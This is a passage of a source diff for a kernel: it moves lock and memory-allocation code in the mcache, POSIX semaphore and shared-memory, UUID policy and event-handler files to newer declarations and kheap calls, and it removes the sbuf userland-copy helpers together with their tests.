-1; ccp->cc_pobjs = -1; } @@ -896,17 +862,9 @@ mcache_destroy(mcache_t *cp) cp->mc_slab_free = NULL; cp->mc_slab_audit = NULL; - lck_attr_free(cp->mc_bkt_lock_attr); lck_grp_free(cp->mc_bkt_lock_grp); - lck_grp_attr_free(cp->mc_bkt_lock_grp_attr); - - lck_attr_free(cp->mc_cpu_lock_attr); lck_grp_free(cp->mc_cpu_lock_grp); - lck_grp_attr_free(cp->mc_cpu_lock_grp_attr); - - lck_attr_free(cp->mc_sync_lock_attr); lck_grp_free(cp->mc_sync_lock_grp); - lck_grp_attr_free(cp->mc_sync_lock_grp_attr); /* * TODO: We need to destroy the zone here, but cannot do it @@ -1358,7 +1316,7 @@ mcache_cache_update(mcache_t *cp) int need_bkt_resize = 0; int need_bkt_reenable = 0; - lck_mtx_assert(mcache_llock, LCK_MTX_ASSERT_OWNED); + lck_mtx_assert(&mcache_llock, LCK_MTX_ASSERT_OWNED); mcache_bkt_ws_update(cp); @@ -1645,13 +1603,9 @@ mcache_audit_free_verify_set(mcache_audit_t *mca, void *base, size_t offset, #define MCA_TRN_PREV ((mca->mca_next_trn + mca_trn_max - 1) % mca_trn_max) __private_extern__ char * -mcache_dump_mca(mcache_audit_t *mca) +mcache_dump_mca(char buf[static DUMP_MCA_BUF_SIZE], mcache_audit_t *mca) { - if (mca_dump_buf == NULL) { - return NULL; - } - - snprintf(mca_dump_buf, DUMP_MCA_BUF_SIZE, + snprintf(buf, DUMP_MCA_BUF_SIZE, "mca %p: addr %p, cache %p (%s) nxttrn %d\n" DUMP_TRN_FMT() DUMP_TRN_FMT(), @@ -1663,13 +1617,15 @@ mcache_dump_mca(mcache_audit_t *mca) DUMP_TRN_FIELDS("last", MCA_TRN_LAST), DUMP_TRN_FIELDS("previous", MCA_TRN_PREV)); - return mca_dump_buf; + return buf; } __private_extern__ void mcache_audit_panic(mcache_audit_t *mca, void *addr, size_t offset, int64_t expected, int64_t got) { + char buf[DUMP_MCA_BUF_SIZE]; + if (mca == NULL) { panic("mcache_audit: buffer %p modified after free at " "offset 0x%lx (0x%llx instead of 0x%llx)\n", addr, @@ -1680,7 +1636,7 @@ mcache_audit_panic(mcache_audit_t *mca, void *addr, size_t offset, panic("mcache_audit: buffer %p modified after free at offset 0x%lx " "(0x%llx instead of 0x%llx)\n%s\n", - addr, offset, got, expected, mcache_dump_mca(mca)); + addr, offset, got, expected, mcache_dump_mca(buf, mca)); /* NOTREACHED */ __builtin_unreachable(); } diff --git a/bsd/kern/policy_check.c b/bsd/kern/policy_check.c index 7621bdec3..89a714051 100644 --- a/bsd/kern/policy_check.c +++ b/bsd/kern/policy_check.c @@ -121,7 +121,7 @@ common_hook(void) return rv; } -#if (MAC_POLICY_OPS_VERSION != 69) +#if (MAC_POLICY_OPS_VERSION != 74) # error "struct mac_policy_ops doesn't match definition in mac_policy.h" #endif /* @@ -238,9 +238,9 @@ const static struct mac_policy_ops policy_ops = { CHECK_SET_HOOK(mount_label_init) CHECK_SET_HOOK(mount_label_internalize) - .mpo_reserved38 = (mpo_reserved_hook_t *)common_hook, - .mpo_reserved39 = (mpo_reserved_hook_t *)common_hook, - .mpo_reserved40 = (mpo_reserved_hook_t *)common_hook, + CHECK_SET_HOOK(proc_check_expose_task_with_flavor) + CHECK_SET_HOOK(proc_check_get_task_with_flavor) + CHECK_SET_HOOK(proc_check_task_id_token_get_task) CHECK_SET_HOOK(pipe_check_ioctl) CHECK_SET_HOOK(pipe_check_kqfilter) @@ -339,8 +339,8 @@ const static struct mac_policy_ops policy_ops = { CHECK_SET_HOOK(socket_check_setsockopt) CHECK_SET_HOOK(socket_check_getsockopt) - .mpo_reserved50 = (mpo_reserved_hook_t *)common_hook, - .mpo_reserved51 = (mpo_reserved_hook_t *)common_hook, + CHECK_SET_HOOK(proc_check_get_movable_control_port) + CHECK_SET_HOOK(proc_check_dyld_process_info_notify_register) .mpo_reserved52 = (mpo_reserved_hook_t *)common_hook, .mpo_reserved53 = (mpo_reserved_hook_t *)common_hook, .mpo_reserved54 = (mpo_reserved_hook_t *)common_hook, @@ -351,7 +351,8 @@ const static struct mac_policy_ops policy_ops = { .mpo_reserved59 = (mpo_reserved_hook_t *)common_hook, .mpo_reserved60 = (mpo_reserved_hook_t *)common_hook, .mpo_reserved61 = (mpo_reserved_hook_t *)common_hook, - .mpo_reserved62 = (mpo_reserved_hook_t *)common_hook, + + CHECK_SET_HOOK(iokit_check_open_service) CHECK_SET_HOOK(system_check_acct) CHECK_SET_HOOK(system_check_audit) diff --git a/bsd/kern/posix_sem.c b/bsd/kern/posix_sem.c index 38106d043..3b5fc195a 100644 --- a/bsd/kern/posix_sem.c +++ b/bsd/kern/posix_sem.c @@ -181,13 +181,11 @@ static const struct fileops psemops = { .fo_kqfilter = fo_no_kqfilter, }; -static lck_grp_t *psx_sem_subsys_lck_grp; -static lck_grp_attr_t *psx_sem_subsys_lck_grp_attr; -static lck_attr_t *psx_sem_subsys_lck_attr; -static lck_mtx_t psx_sem_subsys_mutex; +static LCK_GRP_DECLARE(psx_sem_subsys_lck_grp, "posix semaphores"); +static LCK_MTX_DECLARE(psx_sem_subsys_mutex, &psx_sem_subsys_lck_grp); -#define PSEM_SUBSYS_LOCK() lck_mtx_lock(& psx_sem_subsys_mutex) -#define PSEM_SUBSYS_UNLOCK() lck_mtx_unlock(& psx_sem_subsys_mutex) +#define PSEM_SUBSYS_LOCK() lck_mtx_lock(&psx_sem_subsys_mutex) +#define PSEM_SUBSYS_UNLOCK() lck_mtx_unlock(&psx_sem_subsys_mutex) #define PSEM_SUBSYS_ASSERT_HELD() LCK_MTX_ASSERT(&psx_sem_subsys_mutex, LCK_MTX_ASSERT_OWNED) @@ -195,19 +193,6 @@ static int psem_cache_add(struct pseminfo *psemp, struct psemname *pnp, struct p static void psem_cache_delete(struct psemcache *pcp); int psem_cache_purge_all(proc_t); - -/* Initialize the mutex governing access to the posix sem subsystem */ -__private_extern__ void -psem_lock_init( void ) -{ - psx_sem_subsys_lck_grp_attr = lck_grp_attr_alloc_init(); - - psx_sem_subsys_lck_grp = lck_grp_alloc_init("posix shared memory", psx_sem_subsys_lck_grp_attr); - - psx_sem_subsys_lck_attr = lck_attr_alloc_init(); - lck_mtx_init(&psx_sem_subsys_mutex, psx_sem_subsys_lck_grp, psx_sem_subsys_lck_attr); -} - /* * Lookup an entry in the cache * @@ -470,13 +455,13 @@ sem_open(proc_t p, struct sem_open_args *uap, user_addr_t *retval) * allowed and the one at the front of the LRU list is in use. * Otherwise we use the one at the front of the LRU list. */ - MALLOC(pcp, struct psemcache *, sizeof(struct psemcache), M_SHM, M_WAITOK | M_ZERO); + pcp = kheap_alloc(KM_SHM, sizeof(struct psemcache), Z_WAITOK | Z_ZERO); if (pcp == PSEMCACHE_NULL) { error = ENOMEM; goto bad; } - MALLOC(new_pinfo, struct pseminfo *, sizeof(struct pseminfo), M_SHM, M_WAITOK | M_ZERO); + new_pinfo = kheap_alloc(KM_SHM, sizeof(struct pseminfo), Z_WAITOK | Z_ZERO); if (new_pinfo == NULL) { error = ENOSPC; goto bad; @@ -517,7 +502,7 @@ sem_open(proc_t p, struct sem_open_args *uap, user_addr_t *retval) } } - MALLOC(new_pnode, struct psemnode *, sizeof(struct psemnode), M_SHM, M_WAITOK | M_ZERO); + new_pnode = kheap_alloc(KM_SHM, sizeof(struct psemnode), Z_WAITOK | Z_ZERO); if (new_pnode == NULL) { error = ENOSPC; goto bad; @@ -616,7 +601,7 @@ sem_open(proc_t p, struct sem_open_args *uap, user_addr_t *retval) * new . and we must free them. */ if (incache) { - FREE(pcp, M_SHM); + kheap_free(KM_SHM, pcp, sizeof(struct psemcache)); pcp = PSEMCACHE_NULL; if (new_pinfo != PSEMINFO_NULL) { /* return value ignored - we can't _not_ do this */ @@ -624,7 +609,7 @@ sem_open(proc_t p, struct sem_open_args *uap, user_addr_t *retval) #if CONFIG_MACF mac_posixsem_label_destroy(new_pinfo); #endif - FREE(new_pinfo, M_SHM); + kheap_free(KM_SHM, new_pinfo, sizeof(struct pseminfo)); new_pinfo = PSEMINFO_NULL; } } @@ -644,13 +629,9 @@ sem_open(proc_t p, struct sem_open_args *uap, user_addr_t *retval) bad_locked: PSEM_SUBSYS_UNLOCK(); bad: - if (pcp != PSEMCACHE_NULL) { - FREE(pcp, M_SHM); - } + kheap_free(KM_SHM, pcp, sizeof(struct psemcache)); - if (new_pnode != PSEMNODE_NULL) { - FREE(new_pnode, M_SHM); - } + kheap_free(KM_SHM, new_pnode, sizeof(struct psemnode)); if (fp != NULL) { fp_free(p, indx, fp); @@ -669,7 +650,7 @@ bad: #if CONFIG_MACF mac_posixsem_label_destroy(new_pinfo); #endif - FREE(new_pinfo, M_SHM); + kheap_free(KM_SHM, new_pinfo, sizeof(struct pseminfo)); } if (pnbuf != NULL) { @@ -720,13 +701,13 @@ psem_unlink_internal(struct pseminfo *pinfo, struct psemcache *pcache) if (!pinfo->psem_usecount) { psem_delete(pinfo); - FREE(pinfo, M_SHM); + kheap_free(KM_SHM, pinfo, sizeof(struct pseminfo)); } else { pinfo->psem_flags |= PSEM_REMOVED; } psem_cache_delete(pcache); - FREE(pcache, M_SHM); + kheap_free(KM_SHM, pcache, sizeof(struct psemcache)); return 0; } @@ -1045,12 +1026,12 @@ psem_close(struct psemnode *pnode) PSEM_SUBSYS_UNLOCK(); /* lock dropped as only semaphore is destroyed here */ error = psem_delete(pinfo); - FREE(pinfo, M_SHM); + kheap_free(KM_SHM, pinfo, sizeof(struct pseminfo)); } else { PSEM_SUBSYS_UNLOCK(); } /* subsystem lock is dropped when we get here */ - FREE(pnode, M_SHM); + kheap_free(KM_SHM, pnode, sizeof(struct psemnode)); return error; } diff --git a/bsd/kern/posix_shm.c b/bsd/kern/posix_shm.c index bffc46999..4f22edd28 100644 --- a/bsd/kern/posix_shm.c +++ b/bsd/kern/posix_shm.c @@ -81,7 +81,6 @@ #include #include #include -#include #include #include @@ -204,28 +203,13 @@ static const struct fileops pshmops = { /* * Everything here is protected by a single mutex. */ -static lck_grp_t *psx_shm_subsys_lck_grp; -static lck_grp_attr_t *psx_shm_subsys_lck_grp_attr; -static lck_attr_t *psx_shm_subsys_lck_attr; -static lck_mtx_t psx_shm_subsys_mutex; +static LCK_GRP_DECLARE(psx_shm_subsys_lck_grp, "posix shared memory"); +static LCK_MTX_DECLARE(psx_shm_subsys_mutex, &psx_shm_subsys_lck_grp); #define PSHM_SUBSYS_LOCK() lck_mtx_lock(& psx_shm_subsys_mutex) #define PSHM_SUBSYS_UNLOCK() lck_mtx_unlock(& psx_shm_subsys_mutex) #define PSHM_SUBSYS_ASSERT_HELD() LCK_MTX_ASSERT(&psx_shm_subsys_mutex, LCK_MTX_ASSERT_OWNED) - -__private_extern__ void -pshm_lock_init( void ) -{ - psx_shm_subsys_lck_grp_attr = lck_grp_attr_alloc_init(); - - psx_shm_subsys_lck_grp = - lck_grp_alloc_init("posix shared memory", psx_shm_subsys_lck_grp_attr); - - psx_shm_subsys_lck_attr = lck_attr_alloc_init(); - lck_mtx_init(&psx_shm_subsys_mutex, psx_shm_subsys_lck_grp, psx_shm_subsys_lck_attr); -} - /* * Lookup an entry in the cache. Only the name is used from "look". */ @@ -358,7 +342,7 @@ shm_open(proc_t p, struct shm_open_args *uap, int32_t *retval) * Allocate data structures we need. We parse the userspace name into * a pshm_info_t, even when we don't need to O_CREAT. */ - MALLOC(new_pinfo, pshm_info_t *, sizeof(pshm_info_t), M_SHM, M_WAITOK | M_ZERO); + new_pinfo = kheap_alloc(KM_SHM, sizeof(pshm_info_t), Z_WAITOK | Z_ZERO); if (new_pinfo == NULL) { error = ENOSPC; goto bad; @@ -392,7 +376,8 @@ shm_open(proc_t p, struct shm_open_args *uap, int32_t *retval) /* * Will need a new pnode for the file pointer */ - MALLOC(new_pnode, pshmnode_t *, sizeof(pshmnode_t), M_SHM, M_WAITOK | M_ZERO); + new_pnode = kheap_alloc(KM_SHM, sizeof(pshmnode_t), + Z_WAITOK | Z_ZERO); if (new_pnode == NULL) { error = ENOSPC; goto bad; @@ -516,9 +501,7 @@ bad: /* * Delete any allocated unused data structures. */ - if (new_pnode != NULL) { - FREE(new_pnode, M_SHM); - } + kheap_free(KM_SHM, new_pnode, sizeof(pshmnode_t)); if (fp != NULL) { fp_free(p, indx, fp); @@ -531,7 +514,7 @@ done: mac_posixshm_label_destroy(&new_pinfo->pshm_hdr); } #endif - FREE(new_pinfo, M_SHM); + kheap_free(KM_SHM, new_pinfo, sizeof(pshm_info_t)); } return error; } @@ -628,7 +611,7 @@ pshm_truncate( } /* get a list entry to track the memory object */ - MALLOC(pshmobj, pshm_mobj_t *, sizeof(pshm_mobj_t), M_SHM, M_WAITOK); + pshmobj = kheap_alloc(KM_SHM, sizeof(pshm_mobj_t), Z_WAITOK); if (pshmobj == NULL) { kret = KERN_NO_SPACE; mach_memory_entry_port_release(mem_object); @@ -666,7 +649,7 @@ out: SLIST_REMOVE_HEAD(&pinfo->pshm_mobjs, pshmo_next); PSHM_SUBSYS_UNLOCK(); mach_memory_entry_port_release(pshmobj->pshmo_memobject); - FREE(pshmobj, M_SHM); + kheap_free(KM_SHM, pshmobj, sizeof(pshm_mobj_t)); PSHM_SUBSYS_LOCK(); } pinfo->pshm_flags &= ~PSHM_ALLOCATING; @@ -987,7 +970,8 @@ shm_unlink(proc_t p, struct shm_unlink_args *uap, __unused int32_t *retval) /* * Get the name from user args. */ - MALLOC(name_pinfo, pshm_info_t *, sizeof(pshm_info_t), M_SHM, M_WAITOK | M_ZERO); + name_pinfo = kheap_alloc(KHEAP_TEMP, sizeof(pshm_info_t), + Z_WAITOK | Z_ZERO); if (name_pinfo == NULL) { error = ENOSPC; goto bad; @@ -1031,9 +1015,7 @@ shm_unlink(proc_t p, struct shm_unlink_args *uap, __unused int32_t *retval) bad_unlock: PSHM_SUBSYS_UNLOCK(); bad: - if (name_pinfo != NULL) { - FREE(name_pinfo, M_SHM); - } + kheap_free(KHEAP_TEMP, name_pinfo, sizeof(pshm_info_t)); return error; } @@ -1080,11 +1062,11 @@ pshm_deref(pshm_info_t *pinfo) while ((pshmobj = SLIST_FIRST(&pinfo->pshm_mobjs)) != NULL) { SLIST_REMOVE_HEAD(&pinfo->pshm_mobjs, pshmo_next); mach_memory_entry_port_release(pshmobj->pshmo_memobject); - FREE(pshmobj, M_SHM); + kheap_free(KM_SHM, pshmobj, sizeof(pshm_mobj_t)); } /* free the pinfo itself */ - FREE(pinfo, M_SHM); + kheap_free(KM_SHM, pinfo, sizeof(pshm_info_t)); PSHM_SUBSYS_LOCK(); } @@ -1110,9 +1092,7 @@ pshm_closefile(struct fileglob *fg, __unused vfs_context_t ctx) } PSHM_SUBSYS_UNLOCK(); - if (pnode != NULL) { - FREE(pnode, M_SHM); - } + kheap_free(KM_SHM, pnode, sizeof(pshmnode_t)); return error; } diff --git a/bsd/kern/proc_uuid_policy.c b/bsd/kern/proc_uuid_policy.c index 04d1aeda4..3d38327c9 100644 --- a/bsd/kern/proc_uuid_policy.c +++ b/bsd/kern/proc_uuid_policy.c @@ -49,10 +49,10 @@ #define dprintf(...) do { } while(0) #endif -static lck_grp_attr_t *proc_uuid_policy_subsys_lck_grp_attr; -static lck_grp_t *proc_uuid_policy_subsys_lck_grp; -static lck_attr_t *proc_uuid_policy_subsys_lck_attr; -static lck_mtx_t proc_uuid_policy_subsys_mutex; +static LCK_GRP_DECLARE(proc_uuid_policy_subsys_lck_grp, + "proc_uuid_policy_subsys_lock"); +static LCK_MTX_DECLARE(proc_uuid_policy_subsys_mutex, + &proc_uuid_policy_subsys_lck_grp); #define PROC_UUID_POLICY_SUBSYS_LOCK() lck_mtx_lock(&proc_uuid_policy_subsys_mutex) #define PROC_UUID_POLICY_SUBSYS_UNLOCK() lck_mtx_unlock(&proc_uuid_policy_subsys_mutex) @@ -85,6 +85,12 @@ struct proc_uuid_policy_entry { uint32_t flags; /* policy flag for that UUID */ }; +/* + * If you need accounting for KM_PROC_UUID_POLICY consider using + * KALLOC_HEAP_DEFINE to define a view. + */ +#define KM_PROC_UUID_POLICY KHEAP_DEFAULT + static int proc_uuid_policy_insert(uuid_t uuid, uint32_t flags); @@ -103,11 +109,6 @@ proc_uuid_policy_clear(uint32_t flags); void proc_uuid_policy_init(void) { - proc_uuid_policy_subsys_lck_grp_attr = lck_grp_attr_alloc_init(); - proc_uuid_policy_subsys_lck_grp = lck_grp_alloc_init("proc_uuid_policy_subsys_lock", proc_uuid_policy_subsys_lck_grp_attr); - proc_uuid_policy_subsys_lck_attr = lck_attr_alloc_init(); - lck_mtx_init(&proc_uuid_policy_subsys_mutex, proc_uuid_policy_subsys_lck_grp, proc_uuid_policy_subsys_lck_attr); - proc_uuid_policy_hashtbl = hashinit(PROC_UUID_POLICY_HASH_SIZE, M_PROC_UUID_POLICY, &proc_uuid_policy_hash_mask); proc_uuid_policy_table_gencount = 1; proc_uuid_policy_count = 0; @@ -128,7 +129,8 @@ proc_uuid_policy_insert(uuid_t uuid, uint32_t flags) return EINVAL; } - MALLOC(entry, struct proc_uuid_policy_entry *, sizeof(*entry), M_PROC_UUID_POLICY, M_WAITOK | M_ZERO); + entry = kheap_alloc(KM_PROC_UUID_POLICY, sizeof(struct proc_uuid_policy_entry), + Z_WAITOK | Z_ZERO); memcpy(entry->uuid, uuid, sizeof(uuid_t)); entry->flags = flags; @@ -140,7 +142,7 @@ proc_uuid_policy_insert(uuid_t uuid, uint32_t flags) /* The UUID is already in the list. Update the flags. */ foundentry->flags |= flags; error = 0; - FREE(entry, M_PROC_UUID_POLICY); + kheap_free(KM_PROC_UUID_POLICY, entry, sizeof(struct proc_uuid_policy_entry)); entry = NULL; BUMP_PROC_UUID_POLICY_GENERATION_COUNT(); } else { @@ -158,7 +160,7 @@ proc_uuid_policy_insert(uuid_t uuid, uint32_t flags) PROC_UUID_POLICY_SUBSYS_UNLOCK(); if (error) { - FREE(entry, M_PROC_UUID_POLICY); + kheap_free(KM_PROC_UUID_POLICY, entry, sizeof(struct proc_uuid_policy_entry)); dprintf("Failed to insert proc uuid policy (%s,0x%08x), table full\n", uuidstr, flags); } else { dprintf("Inserted proc uuid policy (%s,0x%08x)\n", uuidstr, flags); @@ -222,7 +224,7 @@ proc_uuid_policy_remove(uuid_t uuid, uint32_t flags) /* If we had found a pre-existing entry, deallocate its memory now */ if (delentry && should_delete) { - FREE(delentry, M_PROC_UUID_POLICY); + kheap_free(KM_PROC_UUID_POLICY, delentry, sizeof(struct proc_uuid_policy_entry)); } if (error) { @@ -332,7 +334,8 @@ proc_uuid_policy_clear(uint32_t flags) /* Memory deallocation happens after the hash lock is dropped */ LIST_FOREACH_SAFE(searchentry, &deletehead, entries, tmpentry) { LIST_REMOVE(searchentry, entries); - FREE(searchentry, M_PROC_UUID_POLICY); + kheap_free(KM_PROC_UUID_POLICY, searchentry, + sizeof(struct proc_uuid_policy_entry)); } dprintf("Clearing proc uuid policy table\n"); diff --git a/bsd/kern/subr_eventhandler.c b/bsd/kern/subr_eventhandler.c index d7f3f5cbd..167a99bef 100644 --- a/bsd/kern/subr_eventhandler.c +++ b/bsd/kern/subr_eventhandler.c @@ -65,8 +65,6 @@ int evh_debug = 0; -MALLOC_DEFINE(M_EVENTHANDLER, "eventhandler", "Event handler records"); - SYSCTL_NODE(_kern, OID_AUTO, eventhandler, CTLFLAG_RW | CTLFLAG_LOCKED, 0, "Eventhandler"); SYSCTL_INT(_kern_eventhandler, OID_AUTO, debug, CTLFLAG_RW | CTLFLAG_LOCKED, @@ -76,9 +74,7 @@ struct eventhandler_entry_arg eventhandler_entry_dummy_arg = { .ee_fm_uuid = { 0 /* List of 'slow' lists */ static struct eventhandler_lists_ctxt evthdlr_lists_ctxt_glb; -static lck_grp_attr_t *eventhandler_mutex_grp_attr; -static lck_grp_t *eventhandler_mutex_grp; -static lck_attr_t *eventhandler_mutex_attr; +static LCK_GRP_DECLARE(eventhandler_mutex_grp, "eventhandler"); static unsigned int eg_size; /* size of eventhandler_entry_generic */ static struct mcache *eg_cache; /* mcache for eventhandler_entry_generic */ @@ -86,9 +82,8 @@ static struct mcache *eg_cache; /* mcache for eventhandler_entry_generic */ static unsigned int el_size; /* size of eventhandler_list */ static struct mcache *el_cache; /* mcache for eventhandler_list */ -static lck_grp_attr_t *el_lock_grp_attr; -lck_grp_t *el_lock_grp; -lck_attr_t *el_lock_attr; +LCK_GRP_DECLARE(el_lock_grp, "eventhandler list"); +LCK_ATTR_DECLARE(el_lock_attr, 0, 0); struct eventhandler_entry_generic { struct eventhandler_entry ee; @@ -106,7 +101,7 @@ eventhandler_lists_ctxt_init(struct eventhandler_lists_ctxt *evthdlr_lists_ctxt) TAILQ_INIT(&evthdlr_lists_ctxt->eventhandler_lists); evthdlr_lists_ctxt->eventhandler_lists_initted = 1; lck_mtx_init(&evthdlr_lists_ctxt->eventhandler_mutex, - eventhandler_mutex_grp, eventhandler_mutex_attr); + &eventhandler_mutex_grp, LCK_ATTR_NULL); } /* @@ -115,16 +110,6 @@ eventhandler_lists_ctxt_init(struct eventhandler_lists_ctxt *evthdlr_lists_ctxt) void eventhandler_init(void) { - eventhandler_mutex_grp_attr = lck_grp_attr_alloc_init(); - eventhandler_mutex_grp = lck_grp_alloc_init("eventhandler", - eventhandler_mutex_grp_attr); - eventhandler_mutex_attr = lck_attr_alloc_init(); - - el_lock_grp_attr = lck_grp_attr_alloc_init(); - el_lock_grp = lck_grp_alloc_init("eventhandler list", - el_lock_grp_attr); - el_lock_attr = lck_attr_alloc_init(); - eventhandler_lists_ctxt_init(&evthdlr_lists_ctxt_glb); eg_size = sizeof(struct eventhandler_entry_generic); @@ -385,6 +370,6 @@ eventhandler_lists_ctxt_destroy(struct eventhandler_lists_ctxt *evthdlr_lists_ct } lck_mtx_unlock(&evthdlr_lists_ctxt->eventhandler_mutex); lck_mtx_destroy(&evthdlr_lists_ctxt->eventhandler_mutex, - eventhandler_mutex_grp); + &eventhandler_mutex_grp); return; } diff --git a/bsd/kern/subr_sbuf.c b/bsd/kern/subr_sbuf.c index 190485145..8196722e9 100644 --- a/bsd/kern/subr_sbuf.c +++ b/bsd/kern/subr_sbuf.c @@ -705,147 +705,6 @@ sbuf_done(struct sbuf *s) return !!SBUF_ISFINISHED(s); } -/*! - * @function sbuf_uionew - * - * @brief - * Create a new sbuf and initialize its buffer with data from the given uio. - * - * @param s - * An optional existing sbuf to initialize, or NULL to allocate a new one. - * - * @param uio - * The uio describing the data to populate the sbuf with. - * - * @param error - * An output parameter to report any error to. - * - * @returns - * The new and/or initialized sbuf, or NULL on error. The error code is - * reported back via @a error. - */ -struct sbuf * -sbuf_uionew(struct sbuf *s, struct uio *uio, int *error) -{ - int size; - - if ((user_size_t)uio_resid(uio) > INT_MAX - 1) { - *error = EINVAL; - return NULL; - } - - size = (int)uio_resid(uio); - s = sbuf_new(s, NULL, size + 1, 0); - if (s == NULL) { - *error = ENOMEM; - return NULL; - } - - *error = uiomove(s->s_buf, size, uio); - if (*error != 0) { - sbuf_delete(s); - return NULL; - } - - s->s_len = size; - *error = 0; - - return s; -} - -/*! - * @function sbuf_bcopyin - * - * @brief - * Append userland data to an sbuf. - * - * @param s - * The sbuf. - * - * @param uaddr - * The userland address of data to append to the sbuf. - * - * @param len - * The length of the data to copy from userland. - * - * @returns - * 0 on success or -1 on error. Always returns -1 if the sbuf is marked as - * overflowed. - */ -int -sbuf_bcopyin(struct sbuf *s, const void *uaddr, size_t len) -{ - if (SBUF_HASOVERFLOWED(s)) { - return -1; - } - - if (len == 0) { - return 0; - } - - if (-1 == sbuf_ensure_capacity(s, len)) { - SBUF_SETFLAG(s, SBUF_OVERFLOWED); - return -1; - } - - if (copyin(CAST_USER_ADDR_T(uaddr), &s->s_buf[s->s_len], len) != 0) { - return -1; - } - - s->s_len += (int)len; - return 0; -} - -/*! - * @function sbuf_copyin - * - * @brief - * Append a userland string to an sbuf. - * - * @param s - * The sbuf. - * - * @param uaddr - * The userland address of the string to append to the sbuf. - * - * @param len - * The maximum length of the string to copy. If zero, the current capacity of - * the sbuf is used. - * - * @returns - * The number of bytes copied or -1 if an error occurred. Always returns -1 if - * the sbuf is marked as overflowed. - */ -int -sbuf_copyin(struct sbuf *s, const void *uaddr, size_t len) -{ - size_t done; - - if (SBUF_HASOVERFLOWED(s)) { - return -1; - } - - if (len == 0) { - len = sbuf_capacity(s); - } else if (-1 == sbuf_ensure_capacity(s, len)) { - return -1; - } - - switch (copyinstr(CAST_USER_ADDR_T(uaddr), &s->s_buf[s->s_len], len + 1, &done)) { - case ENAMETOOLONG: - SBUF_SETFLAG(s, SBUF_OVERFLOWED); - s->s_len += done; - return -1; - case 0: - s->s_len += done - 1; - break; - default: - return -1; - } - - return (int)done; -} - #if DEBUG || DEVELOPMENT /* @@ -1932,258 +1791,6 @@ sysctl_sbuf_tests SYSCTL_HANDLER_ARGS } } - SBUF_TESTING("sbuf_uionew") - { - SBUF_SHOULD("reject residuals that are too large") - { - struct sbuf *s = NULL; - uio_t auio = NULL; - char buf[4]; - int error = 0; - - buf[0] = 'A'; - buf[1] = 'B'; - buf[2] = 'C'; - buf[3] = 'D'; - - auio = uio_create(1, 0, UIO_SYSSPACE, UIO_READ); - uio_addiov(auio, (user_addr_t)buf, INT_MAX); - - s = sbuf_uionew(NULL, auio, &error); - SBUF_ASSERT_EQ(NULL, s); - SBUF_ASSERT_EQ(EINVAL, error); - - uio_free(auio); - } - - SBUF_SHOULD("initialize using data described by the uio") - { - struct sbuf *s = NULL; - uio_t auio = NULL; - char buf[4]; - int error = 0; - - buf[0] = 'A'; - buf[1] = 'B'; - buf[2] = 'C'; - buf[3] = 'D'; - - auio = uio_create(1, 0, UIO_SYSSPACE, UIO_WRITE); - uio_addiov(auio, (user_addr_t)buf, sizeof(buf)); - - s = sbuf_uionew(NULL, auio, &error); - SBUF_ASSERT_NE(NULL, s); - SBUF_ASSERT_EQ(0, error); - SBUF_ASSERT_EQ(4, s->s_len); - SBUF_ASSERT_EQ('A', s->s_buf[0]); - SBUF_ASSERT_EQ('B', s->s_buf[1]); - SBUF_ASSERT_EQ('C', s->s_buf[2]); - SBUF_ASSERT_EQ('D', s->s_buf[3]); - - sbuf_delete(s); - uio_free(auio); - } - - SBUF_SHOULD("fail gracefully for bad addresses") - { - struct sbuf *s = NULL; - uio_t auio = NULL; - int error = 0; - - auio = uio_create(1, 0, UIO_USERSPACE, UIO_WRITE); - uio_addiov(auio, (user_addr_t)0xdeadUL, 123); - - s = sbuf_uionew(NULL, auio, &error); - SBUF_ASSERT_EQ(NULL, s); - SBUF_ASSERT_NE(0, error); - - uio_free(auio); - } - } - - SBUF_TESTING("sbuf_bcopyin") - { - SBUF_SHOULD("succeed when len is zero") - { - struct sbuf *s = NULL; - const void *uptr = (const void *)req->newptr; - - s = sbuf_new(NULL, NULL, 16, 0); - SBUF_ASSERT_EQ(0, sbuf_bcopyin(s, uptr, 0)); - SBUF_ASSERT_EQ(0, s->s_len); - - sbuf_delete(s); - } - - SBUF_SHOULD("succeed in the simple case") - { - struct sbuf *s = NULL; - const void *uptr = (const void *)req->newptr; - size_t ulen = req->newlen; - - s = sbuf_new(NULL, NULL, 16, 0); - SBUF_ASSERT_EQ(0, sbuf_bcopyin(s, uptr, ulen)); - SBUF_ASSERT_EQ(ulen, (size_t)s->s_len); - - sbuf_delete(s); - } - - SBUF_SHOULD("fail for invalid userland addresses") - { - struct sbuf *s = NULL; - const void *uptr = (const void *)0xdeadUL; - size_t ulen = req->newlen; - - s = sbuf_new(NULL, NULL, 16, 0); - SBUF_ASSERT_EQ(-1, sbuf_bcopyin(s, uptr, ulen)); - SBUF_ASSERT_EQ(0, s->s_len); - - sbuf_delete(s); - } - - SBUF_SHOULD("fail for kernel addresses") - { - struct sbuf *s = NULL; - const void *uptr = "abcd"; - size_t ulen = 4; - - s = sbuf_new(NULL, NULL, 16, 0); - SBUF_ASSERT_EQ(-1, sbuf_bcopyin(s, uptr, ulen)); - SBUF_ASSERT_EQ(0, s->s_len); - - sbuf_delete(s); - } - - SBUF_SHOULD("fail if we don't have capacity for a fixed-len sbuf") - { - struct sbuf *s = NULL; - const void *uptr = (const void *)req->newptr; - size_t ulen = req->newlen; - int len_before; - - s = sbuf_new(NULL, NULL, 16, SBUF_FIXEDLEN); - SBUF_ASSERT_EQ(0, sbuf_cpy(s, "0123456789abcde")); - len_before = s->s_len; - SBUF_ASSERT_EQ(-1, sbuf_bcopyin(s, uptr, ulen)); - SBUF_ASSERT_EQ(len_before, s->s_len); - SBUF_ASSERT(SBUF_ISSET(s, SBUF_OVERFLOWED)); - - sbuf_delete(s); - } - - SBUF_SHOULD("auto-extend if we don't have capacity for an auto-extend sbuf") - { - struct sbuf *s = NULL; - const void *uptr = (const void *)req->newptr; - size_t ulen = req->newlen; - int len_before; - - s = sbuf_new(NULL, NULL, 16, SBUF_AUTOEXTEND); - SBUF_ASSERT_EQ(0, sbuf_cpy(s, "0123456789abcde")); - len_before = s->s_len; - SBUF_ASSERT_EQ(0, sbuf_bcopyin(s, uptr, ulen)); - SBUF_ASSERT_EQ(len_before + (int)ulen, s->s_len); - SBUF_ASSERT_NOT(SBUF_ISSET(s, SBUF_OVERFLOWED)); - - sbuf_delete(s); - } - - SBUF_SHOULD("fail if overflowed") - { - struct sbuf *s = NULL; - const void *uptr = (const void *)req->newptr; - size_t ulen = req->newlen; - - s = sbuf_new(NULL, NULL, 16, 0); - SBUF_SETFLAG(s, SBUF_OVERFLOWED); - SBUF_ASSERT_EQ(-1, sbuf_bcopyin(s, uptr, ulen)); - - sbuf_delete(s); - } - } - - 